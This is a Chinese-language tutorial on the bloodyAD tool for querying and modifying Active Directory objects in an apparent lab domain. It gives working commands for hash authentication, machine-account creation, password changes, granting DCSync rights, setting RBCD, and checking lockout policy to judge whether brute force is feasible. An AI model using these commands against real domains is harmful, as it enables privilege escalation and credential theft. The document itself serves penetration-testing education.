对域属性进行查询与修改
使用bloody AD
项目地址:
https://github.com/CravateRouge/bloodyAD
该工具有如下一些功能:
- delObject :删除对象
- addObjectToGroup
- addForeignObjectToGroup
- delObjectFromGroup
- setShadowCredentials
- setGenericAll
- setOwner
- setRbcd
- setDCSync
- setUserAccountControl
1
认证
使用-u参数指定用户,-p参数指定明文密码或Hash。
1
#使用test用户,密码为P@ss1234
-u test -p P@ss1234
#使用win7机器账号和Hash认证
-u win7\$ -p aad3b435b51404ee
aad3b435b51404ee:53ebb01b78
a294aec70afe9a068be55d
2
新建机器用户
使用普通域用户即可创建机器用户machine$,密码为root。
1
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 addComputer machine 'root'

3
修改对象属性
执行如下命令修改指定对象的dNSHostName属性为DC01.xie.com。
1
python3 bloodyAD.py -d xie.com -u
test -p P@ss1234 --host 10.211.55.4 setAttribute 'CN=machine3,CN=Computers,
DC=xie,DC=com' dNSHostName
'["DC01.xie.com"]'

4
修改用户的密码
修改用户hack的密码为P@ssword1234。
1
python3 bloodyAD.py -d xie.com -u administrator -p P@ssword1234 --host 10.211.55.4 changePassword hack 'P@ssword1234'
5
添加/移除DCSync

1
#给域用户hack添加DCSync
python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setDCSync hack
#移除域用户hack的DCSync
python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setDCSync hack False

6
添加/移除RBCD

1
#添加机器账号machine对机器win10的RBCD
python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setRbcd machine win10$
#移除机器账号machine对机器win10的RBCD
python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setRbcd machine win10$ False

7
查询对象
查询域内所有用户
1
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'CN=Users,DC=xie,DC=com' user

查询域内所有机器
2
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'CN=Computers,DC=xie,DC=com' user

查询域管/企业管理员
3
#查询域管
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=Domain Admins,CN=Users,DC=xie,DC=com' member
#查询企业管理员
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=Enterprise Admins,CN=Users,DC=xie,DC=com' member

查询域的所有Container容器
4
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'DC=xie,DC=com' container

查询指定对象属性
5
#查询指定对象所有属性
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com'
或
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes CN=machine4
#查询指定对象指定servicePrincipalName属性
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com' servicePrincipalName


查询域的MAQ属性
6
python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' ms-DS-MachineAccountQuota

查询域的密码锁定策略
如下图,目标域的密码锁定策略是5,当错误大于5次时,用户被锁定。当该值为0时,说明没密码锁定策略,可以进行爆破。
7
python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' LockoutThreshold

查询域的密码锁定时间
8
python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' lockoutDuration

查询域的密码长度最小值
9
python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' minPwdLength

查询域功能级别
10
python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' msDS-Behavior-Version

END